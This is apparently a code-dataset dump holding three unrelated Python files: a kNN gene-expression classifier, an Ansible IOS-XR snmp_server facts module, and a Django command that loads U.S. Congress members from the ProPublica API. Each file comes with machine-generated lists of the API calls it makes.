] | [((4625, 4687), 'numpy.ma.masked_where', 'np.ma.masked_where', (["(mesh_mask['tmask'][0, ...] == 0)", 'tracer_hr'], {}), "(mesh_mask['tmask'][0, ...] == 0, tracer_hr)\n", (4643, 4687), True, 'import numpy as np\n'), ((5016, 5224), 'types.SimpleNamespace', 'SimpleNamespace', ([], {'tracer_var': 'tracer_var', 'tracer_hr': 'tracer_hr', 'surface_hr': 'surface_hr', 'surface_j_limits': '(sj, ej)', 'surface_i_limits': '(si, ei)', 'thalweg_depth_limits': '(0, 450)', 'thalweg_length_limits': '(0, 632)'}), '(tracer_var=tracer_var, tracer_hr=tracer_hr, surface_hr=\n surface_hr, surface_j_limits=(sj, ej), surface_i_limits=(si, ei),\n thalweg_depth_limits=(0, 450), thalweg_length_limits=(0, 632))\n', (5031, 5224), False, 'from types import SimpleNamespace\n'), ((5327, 5402), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': 'figsize', 'facecolor': "theme.COLOURS['figure']['facecolor']"}), "(figsize=figsize, facecolor=theme.COLOURS['figure']['facecolor'])\n", (5337, 5402), True, 'import matplotlib.pyplot as plt\n'), ((5413, 5459), 'matplotlib.gridspec.GridSpec', 'gridspec.GridSpec', (['(1)', '(2)'], {'width_ratios': '[1.4, 1]'}), '(1, 2, width_ratios=[1.4, 1])\n', (5430, 5459), False, 'from matplotlib import gridspec\n'), ((6220, 6321), 'numpy.arange', 'np.arange', (['percent_2_thalweg', 'percent_98_thalweg', '((percent_98_thalweg - percent_2_thalweg) / 20.0)'], {}), '(percent_2_thalweg, percent_98_thalweg, (percent_98_thalweg -\n percent_2_thalweg) / 20.0)\n', (6229, 6321), True, 'import numpy as np\n'), ((6371, 6460), 'numpy.arange', 'np.arange', (['percent_2_surf', 'percent_98_surf', '((percent_98_surf - percent_2_surf) / 20.0)'], {}), '(percent_2_surf, percent_98_surf, (percent_98_surf -\n percent_2_surf) / 20.0)\n', (6380, 6460), True, 'import numpy as np\n'), ((6602, 6832), 'salishsea_tools.visualisations.contour_thalweg', 'vis.contour_thalweg', (['ax', 'plot_data.tracer_hr', 'bathy', 'mesh_mask'], {'clevels': 'clevels', 'cmap': 'cmap', 'thalweg_file': 
'"""/SalishSeaCast/tools/bathymetry/thalweg_working.txt"""', 'cbar_args': "{'fraction': 0.03, 'pad': 0.04, 'aspect': 45}"}), "(ax, plot_data.tracer_hr, bathy, mesh_mask, clevels=\n clevels, cmap=cmap, thalweg_file=\n '/SalishSeaCast/tools/bathymetry/thalweg_working.txt', cbar_args={\n 'fraction': 0.03, 'pad': 0.04, 'aspect': 45})\n", (6621, 6832), True, 'from salishsea_tools import visualisations as vis\n'), ((8240, 8302), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['mesh'], {'ax': 'ax', 'fraction': '(0.034)', 'pad': '(0.04)', 'aspect': '(45)'}), '(mesh, ax=ax, fraction=0.034, pad=0.04, aspect=45)\n', (8252, 8302), True, 'import matplotlib.pyplot as plt\n'), ((8907, 8931), 'salishsea_tools.viz_tools.set_aspect', 'viz_tools.set_aspect', (['ax'], {}), '(ax)\n', (8927, 8931), False, 'from salishsea_tools import viz_tools\n'), ((8006, 8055), 'numpy.arange', 'np.arange', (['*plot_data.surface_i_limits'], {'dtype': 'int'}), '(*plot_data.surface_i_limits, dtype=int)\n', (8015, 8055), True, 'import numpy as np\n'), ((8065, 8114), 'numpy.arange', 'np.arange', (['*plot_data.surface_j_limits'], {'dtype': 'int'}), '(*plot_data.surface_j_limits, dtype=int)\n', (8074, 8114), True, 'import numpy as np\n'), ((5870, 5913), 'numpy.ma.masked_values', 'np.ma.masked_values', (['plot_data.tracer_hr', '(0)'], {}), '(plot_data.tracer_hr, 0)\n', (5889, 5913), True, 'import numpy as np\n'), ((5984, 6027), 'numpy.ma.masked_values', 'np.ma.masked_values', (['plot_data.tracer_hr', '(0)'], {}), '(plot_data.tracer_hr, 0)\n', (6003, 6027), True, 'import numpy as np\n')] |
#!/usr/bin/env python 3.6
# -*- coding: utf-8 -*-
"""
Created on Saturdau Sep 16 16:58:58 2017
@author: Hans - Clément - Ali
"""
#----------Import_module-----------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.decomposition import PCA
from sklearn.model_selection import train_test_split
from sklearn.metrics import roc_curve, auc
from sklearn import neighbors
try:
import ConfigParser as conf
except:
import configparser as conf
# KNN =+> on va voir quel sont les individus qui se ressemble et on va prendre des décision
#-------------------Fontion------------------------------------
def plot(genes):
    """Display a pseudocolour heat map of the first 100 gene columns."""
    first_hundred = genes[np.arange(100)]
    plt.pcolor(first_hundred)
    plt.colorbar()
    plt.title('Example of gene expressions')
    plt.ylabel('samples')
    plt.xlabel('genes')
    plt.show()
def geneHightCorrelation(G, Y):
    """Correlate each gene column of G (skipping its first row) with the
    labels Y and return (rho, w): per-gene Pearson coefficients and the
    indices of genes whose |rho| exceeds 0.1.
    """
    n_genes = G.shape[1]
    rho = np.zeros(n_genes)
    for k in range(n_genes):
        corr_matrix = np.corrcoef(G[1:, k].astype(float), Y.astype(float))
        rho[k] = corr_matrix[0, 1]
    # Keep only genes with a correlation coefficient above 0.1 in magnitude.
    w = np.nonzero(abs(rho) > .1)[0]
    return (rho, w)
def knn(G, Y):
    """Estimate kNN misclassification error over bootstrap splits.

    For each of 100 random 75/25 train/test splits and for k = 1..6
    neighbours, fits a kNN classifier on the genes pre-selected by
    geneHightCorrelation and records the test misclassification rate.

    :param G: expression matrix as ndarray (first row skipped by the
              correlation filter)
    :param Y: class labels, one per sample
    :returns: (ErrClassif, n_neighbors) where ErrClassif[j-1, i] is the
              error for j neighbours on bootstrap split i
    """
    w = geneHightCorrelation(G, Y)[1]
    # NOTE(review): this function reads the module-level DataFrame ``X``
    # rather than its ``G`` argument -- kept for backward compatibility,
    # but the two must describe the same data.
    n = len(X[0])  # number of samples
    Xw = X[w]      # expression of the genes with |rho| > 0.1
    Xw = Xw[1:]
    n_splits = 100
    n_neighbors = np.arange(1, 7)
    ErrClassif = np.zeros([len(n_neighbors), n_splits])
    for i in range(n_splits):
        itrain, itest = train_test_split(range(0, n - 1), test_size=0.25)
        Xtrain = Xw.iloc[itrain]
        ytrain = Y[np.asarray(itrain)]  # itrain is a list, so index with an array
        ytest = Y[np.asarray(itest)]
        for j in n_neighbors:
            clf = neighbors.KNeighborsClassifier(j)
            clf.fit(Xtrain, ytrain)
            yhat = clf.predict(Xw.iloc[itest])
            # BUG FIX: results were previously always written to column 99
            # (ErrClassif[j-1, 99]), discarding 99 of the 100 bootstrap
            # estimates; store each split in its own column instead.
            ErrClassif[j - 1, i] = np.mean(ytest != yhat)
    return (ErrClassif, n_neighbors)
"""
# Best result for 1 neighbor
ibest = 1
ntest = 10 # 10 because len(itest) = 10
y_score = np.zeros([ntest,B]) # 10 because len(itest) = 10
y_test = np.zeros([ntest,B]) # 10 because len(itest) = 10
for b in range(B):
itrain,itest=train_test_split(range(0,n-1),test_size=0.25)
Xtrain = Xw.iloc[itrain]
ytrain = Y[np.asarray(itrain)] # because itrain is a list
# and y is indexed from 6 to ...
ytest = Y[np.asarray(itest)] # because itest is a list
y_test[:,b] = ytest
clf = neighbors.KNeighborsClassifier(ibest)
clf.fit(Xtrain, ytrain)
y_score[:,b] = clf.predict_proba(Xw.iloc[itest])[:,1]
ROC(y_test,y_score,"kNN, 1 neighbor")
"""
#----------------Menu Principale----------------------------------
config = conf.ConfigParser()
config.readfp(open('../configuration.ini','r'))
xtrain= config.get('Data', 'xtrain')
path_xtrain = str(xtrain)
gene = pd.read_table("../data/xtrain.txt", header=None)
labels = pd.read_table("../data/ytrain.txt", header=None)
ncol = gene.shape[1]
X = gene.T
Y = np.array(labels).reshape(184)
G = np.array(X)
geneHightCorrelation(G,Y)
ErrClassif , n_neighbors = knn (G,Y)
#plt.boxplot(ErrClassif.T,labels=n_neighbors)
plt.plot(ErrClassif.T)
plt.ylim(0,1)
plt.ylabel('Mean classification error')
plt.xlabel('nb of neighbors')
#plt.plot(rho)
plt.show()
| [
"numpy.mean",
"matplotlib.pyplot.title",
"configparser.ConfigParser",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.colorbar",
"numpy.asarray",
"sklearn.neighbors.KNeighborsClassifier",
"numpy.array",
"numpy.zeros",
"pandas.read_table",
... | [((2982, 3001), 'configparser.ConfigParser', 'conf.ConfigParser', ([], {}), '()\n', (2999, 3001), True, 'import configparser as conf\n'), ((3126, 3174), 'pandas.read_table', 'pd.read_table', (['"""../data/xtrain.txt"""'], {'header': 'None'}), "('../data/xtrain.txt', header=None)\n", (3139, 3174), True, 'import pandas as pd\n'), ((3185, 3233), 'pandas.read_table', 'pd.read_table', (['"""../data/ytrain.txt"""'], {'header': 'None'}), "('../data/ytrain.txt', header=None)\n", (3198, 3233), True, 'import pandas as pd\n'), ((3312, 3323), 'numpy.array', 'np.array', (['X'], {}), '(X)\n', (3320, 3323), True, 'import numpy as np\n'), ((3443, 3465), 'matplotlib.pyplot.plot', 'plt.plot', (['ErrClassif.T'], {}), '(ErrClassif.T)\n', (3451, 3465), True, 'import matplotlib.pyplot as plt\n'), ((3467, 3481), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0)', '(1)'], {}), '(0, 1)\n', (3475, 3481), True, 'import matplotlib.pyplot as plt\n'), ((3482, 3521), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Mean classification error"""'], {}), "('Mean classification error')\n", (3492, 3521), True, 'import matplotlib.pyplot as plt\n'), ((3523, 3552), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""nb of neighbors"""'], {}), "('nb of neighbors')\n", (3533, 3552), True, 'import matplotlib.pyplot as plt\n'), ((3570, 3580), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3578, 3580), True, 'import matplotlib.pyplot as plt\n'), ((721, 735), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (733, 735), True, 'import matplotlib.pyplot as plt\n'), ((741, 781), 'matplotlib.pyplot.title', 'plt.title', (['"""Example of gene expressions"""'], {}), "('Example of gene expressions')\n", (750, 781), True, 'import matplotlib.pyplot as plt\n'), ((787, 808), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""samples"""'], {}), "('samples')\n", (797, 808), True, 'import matplotlib.pyplot as plt\n'), ((814, 833), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""genes"""'], {}), 
"('genes')\n", (824, 833), True, 'import matplotlib.pyplot as plt\n'), ((839, 849), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (847, 849), True, 'import matplotlib.pyplot as plt\n'), ((913, 927), 'numpy.zeros', 'np.zeros', (['ncol'], {}), '(ncol)\n', (921, 927), True, 'import numpy as np\n'), ((1515, 1530), 'numpy.arange', 'np.arange', (['(1)', '(7)'], {}), '(1, 7)\n', (1524, 1530), True, 'import numpy as np\n'), ((3277, 3293), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (3285, 3293), True, 'import numpy as np\n'), ((699, 713), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (708, 713), True, 'import numpy as np\n'), ((1736, 1754), 'numpy.asarray', 'np.asarray', (['itrain'], {}), '(itrain)\n', (1746, 1754), True, 'import numpy as np\n'), ((1857, 1874), 'numpy.asarray', 'np.asarray', (['itest'], {}), '(itest)\n', (1867, 1874), True, 'import numpy as np\n'), ((1939, 1972), 'sklearn.neighbors.KNeighborsClassifier', 'neighbors.KNeighborsClassifier', (['j'], {}), '(j)\n', (1969, 1972), False, 'from sklearn import neighbors\n'), ((2087, 2109), 'numpy.mean', 'np.mean', (['(ytest != yhat)'], {}), '(ytest != yhat)\n', (2094, 2109), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
# Copyright 2021 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
"""
The iosxr snmp_server fact class
It is in this file the configuration is collected from the device
for a given resource, parsed, and the facts tree is populated
based on the configuration.
"""
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common import (
utils,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.rm_templates.snmp_server import (
Snmp_serverTemplate,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.argspec.snmp_server.snmp_server import (
Snmp_serverArgs,
)
from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import (
flatten_config,
)
class Snmp_serverFacts(object):
    """The iosxr snmp_server facts class.

    Collects the snmp-server section of the running configuration from an
    IOS-XR device, parses it with the Snmp_server resource-module template,
    and populates the facts tree under ``ansible_network_resources``.
    """

    def __init__(self, module, subspec="config", options="options"):
        # subspec/options are accepted for signature compatibility with
        # the other facts classes but are not used here.
        self._module = module
        self.argument_spec = Snmp_serverArgs.argument_spec

    def get_config(self, connection):
        """Return the raw snmp-server running configuration text."""
        return connection.get("show running-config snmp-server")

    def populate_facts(self, connection, ansible_facts, data=None):
        """ Populate the facts for Snmp_server network resource

        :param connection: the device connection
        :param ansible_facts: Facts dictionary
        :param data: previously collected conf

        :rtype: dictionary
        :returns: facts
        """
        facts = {}
        objs = []

        if not data:
            data = self.get_config(connection)

        # Contexts whose indented sub-blocks must be flattened onto single
        # lines so the line-oriented template parsers can match them.
        # ("snmp-server correlator rule" appeared twice in the original
        # list; the redundant second pass has been removed.)
        flatten_context_list = [
            "snmp-server vrf",
            "snmp-server mib bulkstat schema",
            "snmp-server mib bulkstat transfer-id",
            "snmp-server correlator rule",
            "snmp-server interface",
            "snmp-server correlator ruleset",
        ]
        for x in flatten_context_list:
            data = flatten_config(data, x)

        # parse native config using the Snmp_server template
        snmp_server_parser = Snmp_serverTemplate(
            lines=data.splitlines(), module=self._module
        )
        objs = snmp_server_parser.parse()

        # The parser keys these sections by name; the argspec expects
        # lists, so convert the dict values.
        dict_to_list = [
            "context",
            "mib_object_lists",
            "mib_schema",
            "mib_bulkstat_transfer_ids",
            "vrfs",
            "interfaces",
        ]
        for i in dict_to_list:
            if i in objs:
                objs[i] = list(objs[i].values())
                if i == "vrfs":
                    for j in objs[i]:
                        # NOTE(review): assumes the parser always seeds
                        # "hosts" with an empty dict entry -- confirm,
                        # otherwise .remove({}) raises ValueError.
                        j["hosts"].remove({})
                        j["context"] = list(j["context"].values())

        ansible_facts["ansible_network_resources"].pop("snmp_server", None)

        params = utils.remove_empties(
            snmp_server_parser.validate_config(
                self.argument_spec, {"config": objs}, redact=True
            )
        )

        facts["snmp_server"] = params.get("config", {})
        ansible_facts["ansible_network_resources"].update(facts)

        return ansible_facts
| [
"ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils.flatten_config"
] | [((2112, 2135), 'ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils.flatten_config', 'flatten_config', (['data', 'x'], {}), '(data, x)\n', (2126, 2135), False, 'from ansible_collections.cisco.iosxr.plugins.module_utils.network.iosxr.utils.utils import flatten_config\n')] |
import csv
import os
import requests
import us
from datetime import datetime
from django.core.management.base import BaseCommand
from django.contrib.humanize.templatetags.humanize import ordinal
from fullstack.models import (
Body,
Division,
DivisionLevel,
Office,
Officeholder,
Party,
Person,
)
from tqdm import tqdm
BASE_URL = "https://api.propublica.org/congress/v1"
API_PARTY_MAP = {"R": "Republican", "D": "Democrat", "ID": "Independent"}
class Command(BaseCommand):
    """Bootstrap U.S. congressional reference data.

    Creates the DivisionLevel hierarchy, country/state/district divisions,
    the two congressional bodies and major parties, then loads members of
    the 116th Congress from the ProPublica Congress API and stores them as
    offices and officeholders.
    """

    def create_division_levels(self):
        # Build the DivisionLevel hierarchy top-down and keep references on
        # self for later lookups: country > state > {county, district},
        # county > {township, precinct}.
        self.country, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.COUNTRY
        )
        self.state, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.STATE, parent=self.country
        )
        self.county, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.COUNTY, parent=self.state
        )
        self.district, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.DISTRICT, parent=self.state
        )
        self.township, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.TOWNSHIP, parent=self.county
        )
        self.precinct, created = DivisionLevel.objects.get_or_create(
            name=DivisionLevel.PRECINCT, parent=self.county
        )

    def create_divisions(self, f, districts_per_state):
        """Create the USA, the 50 states and every congressional district.

        ``f`` is the open districts CSV file and ``districts_per_state``
        a csv.DictReader over it.
        """
        usa, created = Division.objects.get_or_create(
            name="United States of America",
            label="United States of America",
            short_label="USA",
            level=self.country,
        )
        for state in us.states.STATES:
            # NOTE(review): seek(0) rewinds the file under the live
            # DictReader so it can be re-iterated per state; after the
            # rewind the header row is re-read as data -- verify the
            # reader still matches each state as intended.
            f.seek(0)
            this_state, created = Division.objects.get_or_create(
                name=state.name,
                label=state.name,
                short_label=state.abbr,
                code=state.fips,
                parent=usa,
                level=self.state,
            )
            for district_state in districts_per_state:
                if district_state["state"] == state.name:
                    num_districts = int(district_state["districts"])
                    if num_districts == 1:
                        # Single-district states get one "at-large" seat.
                        Division.objects.get_or_create(
                            name="{} at-large congressional district".format(
                                state.name
                            ),
                            label="{} at-large congressional district".format(
                                state.name
                            ),
                            short_label="{}-AL".format(state.abbr),
                            code="{}-AL".format(state.abbr),
                            parent=this_state,
                            level=self.district,
                        )
                    else:
                        # Numbered districts: 1..num_districts, with
                        # zero-padded codes like "CA-02".
                        for x in range(1, num_districts + 1):
                            Division.objects.get_or_create(
                                name="{} {} congressional district".format(
                                    state.name, ordinal(x)
                                ),
                                label="{} {} congressional district".format(
                                    state.name, ordinal(x)
                                ),
                                short_label="{}-{}".format(
                                    state.abbr, str(x).zfill(2)
                                ),
                                code="{}-{}".format(state.abbr, str(x).zfill(2)),
                                parent=this_state,
                                level=self.district,
                            )

    def build_congressional_offices(self, chamber):
        """Fetch current members of ``chamber`` ('senate' or 'house') from
        the ProPublica API (hard-coded to the 116th Congress) and create
        the matching Office/Person/Officeholder rows.
        """
        r = requests.get(
            "{0}/{1}/{2}/members.json".format(BASE_URL, "116", chamber),
            headers={
                "X-API-Key": os.environ.get("PROPUBLICA_CONGRESS_API_KEY")
            },
        )
        members = r.json()
        print("Loading U.S. {0} offices".format(chamber.title()))
        for member in tqdm(members["results"][0]["members"]):
            full_state = us.states.lookup(member["state"])
            # NOTE(review): fips > 56 or == 11 appears to skip territories
            # and the District of Columbia -- confirm intent.
            if int(full_state.fips) > 56 or int(full_state.fips) == 11:
                continue
            if chamber == "senate":
                # NOTE(review): if no class tuple matches, senate_class is
                # left over from the previous member (or unbound on the
                # first) -- confirm the API always supplies a valid class.
                for class_tup in Office.SENATE_CLASSES:
                    if class_tup[0] == member["senate_class"]:
                        senate_class = class_tup[0]
                name = "U.S. Senate, {0}, Class {1}".format(
                    full_state.name, senate_class
                )
                division = Division.objects.get(
                    level=self.state, short_label=member["state"]
                )
            elif chamber == "house":
                senate_class = None
                # NOTE(review): "<NAME>" looks like a redacted placeholder
                # for the office label -- confirm the intended string
                # (likely "U.S. House").
                name = "<NAME>, {0}, District {1}".format(
                    full_state.name, member["district"]
                )
                if member["at_large"]:
                    code = "{}-AL".format(member["state"])
                else:
                    code = "{}-{}".format(
                        member["state"], member["district"].zfill(2)
                    )
                division = Division.objects.get(level=self.district, code=code)
            body = Body.objects.get(slug=chamber)
            office, created = Office.objects.get_or_create(
                name=name,
                label=name,
                division=division,
                body=body,
                senate_class=senate_class,
            )
            print(member["last_name"], member["party"])
            party = Party.objects.get(label=API_PARTY_MAP[member["party"]])
            person, created = Person.objects.get_or_create(
                first_name=member["first_name"],
                last_name=member["last_name"],
                gender=member["gender"],
            )
            # Derive the current term window from the next election year:
            # senators serve 6-year terms, representatives 2-year terms.
            if chamber == "senate":
                if not member.get("next_election"):
                    term_start = 2018
                    term_end = 2020
                else:
                    term_start = int(member["next_election"]) - 6
                    term_end = int(member["next_election"])
            else:
                term_start = 2018
                term_end = int(member["next_election"])
            Officeholder.objects.get_or_create(
                office=office,
                party=party,
                person=person,
                term_start=datetime(term_start, 1, 1),
                term_end=datetime(term_end, 1, 1),
            )

    def handle(self, *args, **options):
        # Entry point: seed bodies, parties, levels and divisions, then
        # load both chambers from the API.
        Body.objects.get_or_create(
            slug="senate", label="U.S. Senate", short_label="Senate"
        )
        Body.objects.get_or_create(
            slug="house",
            label="U.S. House of Representatives",
            short_label="U.S. House",
        )
        print("Loading political parties")
        Party.objects.get_or_create(label="Republican", short_label="GOP")
        Party.objects.get_or_create(label="Democrat", short_label="Dem")
        Party.objects.get_or_create(label="Libertarian", short_label="Lib")
        Party.objects.get_or_create(label="Green", short_label="GP")
        Party.objects.get_or_create(label="Independent", short_label="Ind")
        self.create_division_levels()
        # districts.csv ships next to this command's module.
        cmd_path = os.path.dirname(os.path.realpath(__file__))
        csv_path = os.path.join(cmd_path, "../../bin/districts.csv")
        with open(csv_path) as f:
            districts_per_state = csv.DictReader(f)
            self.create_divisions(f, districts_per_state)
        for chamber in ["senate", "house"]:
            self.build_congressional_offices(chamber)
| [
"fullstack.models.Body.objects.get_or_create",
"datetime.datetime",
"csv.DictReader",
"fullstack.models.Body.objects.get",
"tqdm.tqdm",
"os.path.join",
"os.environ.get",
"fullstack.models.Office.objects.get_or_create",
"fullstack.models.Party.objects.get",
"fullstack.models.Party.objects.get_or_cr... | [((574, 637), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.COUNTRY'}), '(name=DivisionLevel.COUNTRY)\n', (609, 637), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((691, 778), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.STATE', 'parent': 'self.country'}), '(name=DivisionLevel.STATE, parent=self.\n country)\n', (726, 778), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((828, 914), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.COUNTY', 'parent': 'self.state'}), '(name=DivisionLevel.COUNTY, parent=self.\n state)\n', (863, 914), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((966, 1054), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.DISTRICT', 'parent': 'self.state'}), '(name=DivisionLevel.DISTRICT, parent=\n self.state)\n', (1001, 1054), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1106, 1195), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.TOWNSHIP', 'parent': 'self.county'}), '(name=DivisionLevel.TOWNSHIP, parent=\n self.county)\n', (1141, 1195), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1247, 1336), 'fullstack.models.DivisionLevel.objects.get_or_create', 'DivisionLevel.objects.get_or_create', ([], {'name': 'DivisionLevel.PRECINCT', 'parent': 'self.county'}), '(name=DivisionLevel.PRECINCT, parent=\n self.county)\n', 
(1282, 1336), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((1434, 1575), 'fullstack.models.Division.objects.get_or_create', 'Division.objects.get_or_create', ([], {'name': '"""United States of America"""', 'label': '"""United States of America"""', 'short_label': '"""USA"""', 'level': 'self.country'}), "(name='United States of America', label=\n 'United States of America', short_label='USA', level=self.country)\n", (1464, 1575), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3836, 3874), 'tqdm.tqdm', 'tqdm', (["members['results'][0]['members']"], {}), "(members['results'][0]['members'])\n", (3840, 3874), False, 'from tqdm import tqdm\n'), ((6407, 6496), 'fullstack.models.Body.objects.get_or_create', 'Body.objects.get_or_create', ([], {'slug': '"""senate"""', 'label': '"""U.S. Senate"""', 'short_label': '"""Senate"""'}), "(slug='senate', label='U.S. Senate', short_label=\n 'Senate')\n", (6433, 6496), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6522, 6632), 'fullstack.models.Body.objects.get_or_create', 'Body.objects.get_or_create', ([], {'slug': '"""house"""', 'label': '"""U.S. House of Representatives"""', 'short_label': '"""U.S. House"""'}), "(slug='house', label=\n 'U.S. House of Representatives', short_label='U.S. 
House')\n", (6548, 6632), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6728, 6794), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Republican"""', 'short_label': '"""GOP"""'}), "(label='Republican', short_label='GOP')\n", (6755, 6794), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6804, 6868), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Democrat"""', 'short_label': '"""Dem"""'}), "(label='Democrat', short_label='Dem')\n", (6831, 6868), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6878, 6945), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Libertarian"""', 'short_label': '"""Lib"""'}), "(label='Libertarian', short_label='Lib')\n", (6905, 6945), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6955, 7015), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Green"""', 'short_label': '"""GP"""'}), "(label='Green', short_label='GP')\n", (6982, 7015), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7025, 7092), 'fullstack.models.Party.objects.get_or_create', 'Party.objects.get_or_create', ([], {'label': '"""Independent"""', 'short_label': '"""Ind"""'}), "(label='Independent', short_label='Ind')\n", (7052, 7092), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7215, 7264), 'os.path.join', 'os.path.join', (['cmd_path', '"""../../bin/districts.csv"""'], {}), "(cmd_path, '../../bin/districts.csv')\n", (7227, 7264), False, 'import os\n'), ((1726, 1866), 
'fullstack.models.Division.objects.get_or_create', 'Division.objects.get_or_create', ([], {'name': 'state.name', 'label': 'state.name', 'short_label': 'state.abbr', 'code': 'state.fips', 'parent': 'usa', 'level': 'self.state'}), '(name=state.name, label=state.name,\n short_label=state.abbr, code=state.fips, parent=usa, level=self.state)\n', (1756, 1866), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3901, 3934), 'us.states.lookup', 'us.states.lookup', (["member['state']"], {}), "(member['state'])\n", (3917, 3934), False, 'import us\n'), ((5067, 5097), 'fullstack.models.Body.objects.get', 'Body.objects.get', ([], {'slug': 'chamber'}), '(slug=chamber)\n', (5083, 5097), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5129, 5242), 'fullstack.models.Office.objects.get_or_create', 'Office.objects.get_or_create', ([], {'name': 'name', 'label': 'name', 'division': 'division', 'body': 'body', 'senate_class': 'senate_class'}), '(name=name, label=name, division=division, body\n =body, senate_class=senate_class)\n', (5157, 5242), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5410, 5465), 'fullstack.models.Party.objects.get', 'Party.objects.get', ([], {'label': "API_PARTY_MAP[member['party']]"}), "(label=API_PARTY_MAP[member['party']])\n", (5427, 5465), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((5497, 5619), 'fullstack.models.Person.objects.get_or_create', 'Person.objects.get_or_create', ([], {'first_name': "member['first_name']", 'last_name': "member['last_name']", 'gender': "member['gender']"}), "(first_name=member['first_name'], last_name=\n member['last_name'], gender=member['gender'])\n", (5525, 5619), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((7168, 
7194), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (7184, 7194), False, 'import os\n'), ((7334, 7351), 'csv.DictReader', 'csv.DictReader', (['f'], {}), '(f)\n', (7348, 7351), False, 'import csv\n'), ((4397, 4464), 'fullstack.models.Division.objects.get', 'Division.objects.get', ([], {'level': 'self.state', 'short_label': "member['state']"}), "(level=self.state, short_label=member['state'])\n", (4417, 4464), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((3648, 3693), 'os.environ.get', 'os.environ.get', (['"""PROPUBLICA_CONGRESS_API_KEY"""'], {}), "('PROPUBLICA_CONGRESS_API_KEY')\n", (3662, 3693), False, 'import os\n'), ((4994, 5046), 'fullstack.models.Division.objects.get', 'Division.objects.get', ([], {'level': 'self.district', 'code': 'code'}), '(level=self.district, code=code)\n', (5014, 5046), False, 'from fullstack.models import Body, Division, DivisionLevel, Office, Officeholder, Party, Person\n'), ((6265, 6291), 'datetime.datetime', 'datetime', (['term_start', '(1)', '(1)'], {}), '(term_start, 1, 1)\n', (6273, 6291), False, 'from datetime import datetime\n'), ((6318, 6342), 'datetime.datetime', 'datetime', (['term_end', '(1)', '(1)'], {}), '(term_end, 1, 1)\n', (6326, 6342), False, 'from datetime import datetime\n'), ((2941, 2951), 'django.contrib.humanize.templatetags.humanize.ordinal', 'ordinal', (['x'], {}), '(x)\n', (2948, 2951), False, 'from 